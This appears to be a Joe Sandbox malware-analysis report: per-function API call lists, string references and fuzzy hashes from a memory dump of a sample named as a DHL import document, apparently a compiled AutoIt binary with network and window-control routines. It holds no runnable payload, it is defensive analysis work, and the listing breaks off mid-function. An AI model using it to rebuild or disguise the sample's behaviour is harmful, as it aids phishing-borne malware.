Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 5e118ae56d2825f9ab0a0f3a19e20e9089317aa853dccc85694702e00d965c57
Instruction ID: 5019bf53f4d4aba52e84b756c10d0cd6ad07ebafa9f1437e5a417c47773c8abc
Opcode Fuzzy Hash: 5e118ae56d2825f9ab0a0f3a19e20e9089317aa853dccc85694702e00d965c57
Instruction Fuzzy Hash: 36319335A00604DFDB10DF69C4A4AAA7FB4FB4530AF54846AE805CB292E771DD8ACB90

Function 00573C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00573C79
SetMenu.USER32(?,00000000), ref: 00573C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00573D10
IsMenu.USER32(?), ref: 00573D24
CreatePopupMenu.USER32 ref: 00573D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00573D5B
DrawMenuBar.USER32 ref: 00573D63

Strings

F, xrefs: 00573D4E
0, xrefs: 00573C54

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 49dca1e633a1b6a9d33091ee838a0c67b53da813f3109cf0949f7ecb6042676a
Instruction ID: d97a4171dedf61a57a0b0bbd96d87c50576b7ea0155704329e3675fb9dd3b8f5
Opcode Fuzzy Hash: 49dca1e633a1b6a9d33091ee838a0c67b53da813f3109cf0949f7ecb6042676a
Instruction Fuzzy Hash: F5418A74A01209AFDB24CF64E844AAA7FB5FF49350F14402CE94AA7360D771AA14EB94

Function 00573A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00573A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00573AA0
GetWindowLongW.USER32(?,000000F0), ref: 00573AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00573AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00573B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00573BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00573BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00573BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00573BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00573C13

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: a8a7895532a3ebac6cd4c5e228e053f930b19707ea02ef3c4ec1a9eaaa9b5493
Instruction ID: 145f669ac77e1e1857e4a353a186e043f9848e9df7519355c5896d6ab1ddf2a8
Opcode Fuzzy Hash: a8a7895532a3ebac6cd4c5e228e053f930b19707ea02ef3c4ec1a9eaaa9b5493
Instruction Fuzzy Hash: 97618C71900248AFDB11DF68DC85EEE7BB8FF49710F104199FA19AB291C770AE45EB50

Function 0054B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0054B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0054A1E1,?,00000001), ref: 0054B165
GetWindowThreadProcessId.USER32(00000000), ref: 0054B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0054A1E1,?,00000001), ref: 0054B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0054B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0054A1E1,?,00000001), ref: 0054B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0054A1E1,?,00000001), ref: 0054B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0054A1E1,?,00000001), ref: 0054B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0054A1E1,?,00000001), ref: 0054B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0054A1E1,?,00000001), ref: 0054B21D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: b8e3476f85e226318640b7b800773c4cbaa18dc90c263cacc6ef7c472ad023ab
Instruction ID: 0f05fe7dde68e9cfc2a7ca72baaf6b086249618a55081c782d57311017a6a0b2
Opcode Fuzzy Hash: b8e3476f85e226318640b7b800773c4cbaa18dc90c263cacc6ef7c472ad023ab
Instruction Fuzzy Hash: F3319375544208BFEB10AF24EC88BAD7FA9BF61315F104159FA05E6190E7B4EA44EF60

Function 00512C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00512C94

Part of subcall function 005129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0051D7D1,00000000,00000000,00000000,00000000,?,0051D7F8,00000000,00000007,00000000,?,0051DBF5,00000000), ref: 005129DE
Part of subcall function 005129C8: GetLastError.KERNEL32(00000000,?,0051D7D1,00000000,00000000,00000000,00000000,?,0051D7F8,00000000,00000007,00000000,?,0051DBF5,00000000,00000000), ref: 005129F0

_free.LIBCMT ref: 00512CA0
_free.LIBCMT ref: 00512CAB
_free.LIBCMT ref: 00512CB6
_free.LIBCMT ref: 00512CC1
_free.LIBCMT ref: 00512CCC
_free.LIBCMT ref: 00512CD7
_free.LIBCMT ref: 00512CE2
_free.LIBCMT ref: 00512CED
_free.LIBCMT ref: 00512CFB

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 07829c63c8344852b20c7507a0f84a43288d00d45046170f717c8ed347b4ea9a
Instruction ID: a3ac83d74b74d50988a7a5f69c120228ee19fdc5744664d639bdc40b4dc37ef8
Opcode Fuzzy Hash: 07829c63c8344852b20c7507a0f84a43288d00d45046170f717c8ed347b4ea9a
Instruction Fuzzy Hash: C5119676100109AFDB02EF58D846CDD3FA5FF45360F4148A5FA489F222D631EEE09B90

Function 004E1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004E1459
OleUninitialize.OLE32(?,00000000), ref: 004E14F8
UnregisterHotKey.USER32(?), ref: 004E16DD
DestroyWindow.USER32(?), ref: 005224B9
FreeLibrary.KERNEL32(?), ref: 0052251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0052254B

Strings

close all, xrefs: 004E1454

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 9c6bb3cc3acb28c6bdd4497f4569ba4b27fea6d799d1ad406493c933975a9a3e
Instruction ID: 70fe0f37503f5f25f68217ca92e911e908ea1d150816e69ee0d5caf434db7161
Opcode Fuzzy Hash: 9c6bb3cc3acb28c6bdd4497f4569ba4b27fea6d799d1ad406493c933975a9a3e
Instruction Fuzzy Hash: 1FD1F335701262DFCB28EF16D498A29FBA0BF05705F14819EE44A6B3A2CB34ED16CF55

Function 00557DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00557FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00557FC1
GetFileAttributesW.KERNEL32(?), ref: 00557FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00558005
SetCurrentDirectoryW.KERNEL32(?), ref: 00558017
SetCurrentDirectoryW.KERNEL32(?), ref: 00558060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 005580B0

Strings

*.*, xrefs: 00558066

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 6575ed6fe69295ac66923c5c5bdb10b583ba51c34b23f564ed6f57ac6fabebef
Instruction ID: 01df34a13aa3cb0aa4c135d885a6ce7bb58942c99d431766f5f537c69a8bbf30
Opcode Fuzzy Hash: 6575ed6fe69295ac66923c5c5bdb10b583ba51c34b23f564ed6f57ac6fabebef
Instruction Fuzzy Hash: ED81DE715083459BCB20EF24D8659AABBE8BB88316F144C5FFC85D7260DB34DD498B52

Function 004E5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 004E5C7A

Part of subcall function 004E5D0A: GetClientRect.USER32(?,?), ref: 004E5D30
Part of subcall function 004E5D0A: GetWindowRect.USER32(?,?), ref: 004E5D71
Part of subcall function 004E5D0A: ScreenToClient.USER32(?,?), ref: 004E5D99

GetDC.USER32 ref: 005246F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00524708
SelectObject.GDI32(00000000,00000000), ref: 00524716
SelectObject.GDI32(00000000,00000000), ref: 0052472B
ReleaseDC.USER32(?,00000000), ref: 00524733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 005247C4

Strings

U, xrefs: 00524693

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: e132085374bc5e02b6cd2d5561dce766bbe261580d7d3f950861cb1ddfe96cfb
Instruction ID: 12d36c6a3b00da989894ae00b8f37c9bfd1739f5da129db6b24cc8a10d4112cc
Opcode Fuzzy Hash: e132085374bc5e02b6cd2d5561dce766bbe261580d7d3f950861cb1ddfe96cfb
Instruction Fuzzy Hash: 5B710331500245DFCF218F64E984ABA3FB1FF4B315F28426AED655A2A6C3359C82EF50

Function 0055359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005535E4

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

LoadStringW.USER32(005B2390,?,00000FFF,?), ref: 0055360A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00553724
^ ERROR, xrefs: 005536C9
Error: , xrefs: 005536EF
Line %d (File "%s"):, xrefs: 0055366B
"%s" (%d) : ==> %s:, xrefs: 00553742

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 09f58fab905953c74fbff8fd22518088be5aa50163c97b0c650ac00b4cfc65c2
Instruction ID: 92da3f4e8a92fb154482e3a8e931e56ec0ddb88809b997c4ec943f8abc5cacd2
Opcode Fuzzy Hash: 09f58fab905953c74fbff8fd22518088be5aa50163c97b0c650ac00b4cfc65c2
Instruction Fuzzy Hash: A0519171C0014AAACF15EBA2DC56EEEBF74FF14346F54412AF505720A1EB342B98DB64

Function 0055C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0055C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0055C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0055C2CA
GetLastError.KERNEL32 ref: 0055C322
SetEvent.KERNEL32(?), ref: 0055C336
InternetCloseHandle.WININET(00000000), ref: 0055C341

Strings

, xrefs: 0055C2BB

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 4fbb21cd10b5dd5af2eeeef46e48dbb9a4374bfd0f5f97bdffc61497a9455bed
Instruction ID: af78fc5a483522aef7a23de1e64286df0b505693f83725a936f773e2290042d6
Opcode Fuzzy Hash: 4fbb21cd10b5dd5af2eeeef46e48dbb9a4374bfd0f5f97bdffc61497a9455bed
Instruction Fuzzy Hash: F4317175500308AFD7219F64DC98A6B7FFCFB59745F10891EF88692211DB30DD48AB60

Function 0054989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00523AAF,?,?,Bad directive syntax error,0057CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 005498BC
LoadStringW.USER32(00000000,?,00523AAF,?), ref: 005498C3

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00549987

Strings

Line %d:, xrefs: 00549912
Error: , xrefs: 00549955
., xrefs: 0054996D
Line %d (File "%s"):, xrefs: 0054992D
%s (%d) : ==> %s.: %s %s, xrefs: 005498F1

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 79913e69e8890d72bc762321bdbeeae8481b4b4bf22b901f7a1c72065c61b713
Instruction ID: fa5f62b0e79fad70f96b534f9ae9118f3605b3f3be29c750090fe7a9b2b1c5ee
Opcode Fuzzy Hash: 79913e69e8890d72bc762321bdbeeae8481b4b4bf22b901f7a1c72065c61b713
Instruction Fuzzy Hash: F021B43180021EABCF16AF91CC4AEEE7B35FF18709F04485EF515620A1EB759A58DB20

Function 0054209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 005420AB
GetClassNameW.USER32(00000000,?,00000100), ref: 005420C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0054214D

Strings

details, xrefs: 005420FB
SHELLDLL_DefView, xrefs: 005420CC
largeicons, xrefs: 005420E1
smallicons, xrefs: 00542115
list, xrefs: 0054212F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: f080f1a560a7d5cf94f2a2580107893e0858815619b60351915790446045dad9
Instruction ID: e7dba366169e2484146dd700bde4c08243ad38fe28a5b1e1e7c01c20ee8ab4ce
Opcode Fuzzy Hash: f080f1a560a7d5cf94f2a2580107893e0858815619b60351915790446045dad9
Instruction Fuzzy Hash: BE115C7A288317BAF6017224EC0BDEE3F9CFF15329F60101AF705A40D1FE655881AA24

Function 0051CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0051CEB7
_free.LIBCMT ref: 0051CF22
_free.LIBCMT ref: 0051CF48
_free.LIBCMT ref: 0051CF71
_free.LIBCMT ref: 0051CFA9
_free.LIBCMT ref: 0051CFDA
_free.LIBCMT ref: 0051D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0051D09C
_free.LIBCMT ref: 0051D0B5

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: bdad723934adfaf801424c1c44887b962cdce79897f9c4525c9bd0014277cd49
Instruction ID: b9f660cbb8d1ae4e93dae46a6454771204b15c743573ed6b66bdff51d172aa7e
Opcode Fuzzy Hash: bdad723934adfaf801424c1c44887b962cdce79897f9c4525c9bd0014277cd49
Instruction Fuzzy Hash: D8613771944302AFFB21AFB49889AFA7FA5BF45320F04066DF90597281E6329DC2D760

Function 005750D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00575186
ShowWindow.USER32(?,00000000), ref: 005751C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 005751CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 005751D1

Part of subcall function 00576FBA: DeleteObject.GDI32(00000000), ref: 00576FE6

GetWindowLongW.USER32(?,000000F0), ref: 0057520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0057521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0057524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00575287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00575296

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: dbd5b575f745d58f21d31d9671333c0a5a026af9d3128cd884f100f51b2fe291
Instruction ID: 970c8dcf3e296d950e33d39884d90aa58236825f9f5b0888ea42e90b346fe71c
Opcode Fuzzy Hash: dbd5b575f745d58f21d31d9671333c0a5a026af9d3128cd884f100f51b2fe291
Instruction Fuzzy Hash: AB51C334A40A09BEEF209F25EC49B983F65FB04326F54C006F65D962E1E7B5A984FB40

Function 004F8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00536890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 005368A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005368B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 005368D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 005368F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004F8874,00000000,00000000,00000000,000000FF,00000000), ref: 00536901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0053691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004F8874,00000000,00000000,00000000,000000FF,00000000), ref: 0053692D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 9b71a7d0ff834f58e6a383d5cffbe9856a4d6af227c006438b3e3199a6af2708
Instruction ID: 26b8a4362db469fb7b7c2023d28247b44f488f82f7c68903484158b76ae82cb9
Opcode Fuzzy Hash: 9b71a7d0ff834f58e6a383d5cffbe9856a4d6af227c006438b3e3199a6af2708
Instruction Fuzzy Hash: D951A870600209EFDB20CF25CC95BAA7BB6FB58350F10851DFA169B2A0DB74E991EB44

Function 0055C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0055C182
GetLastError.KERNEL32 ref: 0055C195
